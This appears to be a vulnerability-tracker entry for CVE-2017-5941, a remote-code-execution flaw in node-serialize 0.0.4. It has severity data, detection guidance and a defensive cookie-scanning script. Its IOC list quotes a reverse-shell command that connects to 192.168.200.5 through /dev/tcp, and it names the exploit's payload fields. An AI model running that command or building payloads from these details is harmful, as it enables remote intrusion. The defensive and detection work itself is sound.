CVE-2017-5941
published 2017-02-09


Priority P277 · critical · 9.8 · CVSS 3.1
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EXPLOIT
EPSS: 61.02% (99.0th percentile)
An issue was discovered in the node-serialize package 0.0.4 for Node.js. Untrusted data passed into the unserialize() function can be exploited to achieve arbitrary code execution by passing a JavaScript Object with an Immediately Invoked Function Expression (IIFE).

Affected

2 ranges
Vendor | Product | Version range | Fixed in
node-serialize_project | node-serialize | <= 0.0.4 |
node-serialize_project | node-serialize | 0 – 0.0.4 |

Detection & IOCs (extracted from sources)

command: exec('bash -i >& /dev/tcp/192.168.200.5/445 0>&1')
port: 445
cookie: profile
version: node-serialize 0.0.4
  • Detect the IIFE marker string '_$$ND_FUNC$$_' in deserialized input — its presence in data passed to unserialize() is the direct trigger for arbitrary code execution.
  • Inspect HTTP cookies (especially a cookie named 'profile') for base64-encoded payloads containing the '_$$ND_FUNC$$_' prefix, which is the exploit delivery mechanism observed in the wild.
  • Monitor for Node.js processes unexpectedly opening listening TCP sockets (e.g., on port 443) via http.createServer().listen(), which is the web shell persistence mechanism used in exploit variant 3.
  • Flag JSON objects containing the key 'webShell' or 'rce' with values prefixed by '_$$ND_FUNC$$_' as these are the exploit payload field names used across multiple public exploit variants.
  • The exploit only triggers when the '_$$ND_FUNC$$_' marker is present AND the function is immediately invoked (IIFE pattern with trailing '()'); serialized functions without the invocation suffix are not directly executed on deserialization.
  • The vulnerability is specific to node-serialize version 0.0.4; detections and mitigations should be scoped to environments running this exact package version.
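
An added example (not from this page or from the node-serialize project) of the cookie check described in the list above: it decodes each cookie value, looks for the '_$$ND_FUNC$$_' marker, and separately reports whether the marked function is followed by an invoking '()'. The function names, severity labels and sample cookie header are assumptions constructed for illustration, and the IIFE test is a heuristic.

```javascript
// Marker string named on this page; its presence in input bound for unserialize() is the trigger.
const MARKER = '_$$ND_FUNC$$_';

// Split a Cookie header into [name, value] pairs, URL-decoding values where possible.
function parseCookies(header) {
  return String(header || '').split(';').map(p => p.trim()).filter(Boolean).map(p => {
    const i = p.indexOf('=');
    const name = i < 0 ? p : p.slice(0, i);
    let value = i < 0 ? '' : p.slice(i + 1);
    try { value = decodeURIComponent(value); } catch (_) { /* keep the raw value */ }
    return [name, value];
  });
}

// Candidate plaintexts for one cookie value: as sent, plus its base64/base64url decoding.
function candidates(value) {
  const out = [value];
  if (value.length >= 8 && /^[A-Za-z0-9+/_-]+={0,2}$/.test(value)) {
    const std = value.replace(/-/g, '+').replace(/_/g, '/');
    out.push(Buffer.from(std, 'base64').toString('utf8'));
  }
  return out;
}

// Return one finding per cookie that carries the marker.
function inspectCookieHeader(header) {
  const findings = [];
  for (const [name, value] of parseCookies(header)) {
    for (const text of candidates(value)) {
      if (!text.includes(MARKER)) continue;
      // Heuristic IIFE test: marked function body whose JSON string ends in "}()".
      const invoked = /_\$\$ND_FUNC\$\$_[\s\S]*\}\s*\(\s*\)\s*"/.test(text);
      findings.push({ cookie: name, invoked, severity: invoked ? 'high' : 'medium' });
      break;
    }
  }
  return findings;
}

// Constructed, benign sample: base64 of a marked function that only returns 1.
const SAMPLE_HEADER = 'session=abc123; profile=' +
  Buffer.from('{"rce":"_$$ND_FUNC$$_function(){ return 1 }()"}').toString('base64');
console.log(inspectCookieHeader(SAMPLE_HEADER));
```

A finding with invoked set to false still deserves review, since the marker has no reason to appear in client-supplied data.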

CVSS provenance

nvd | v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd | v2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P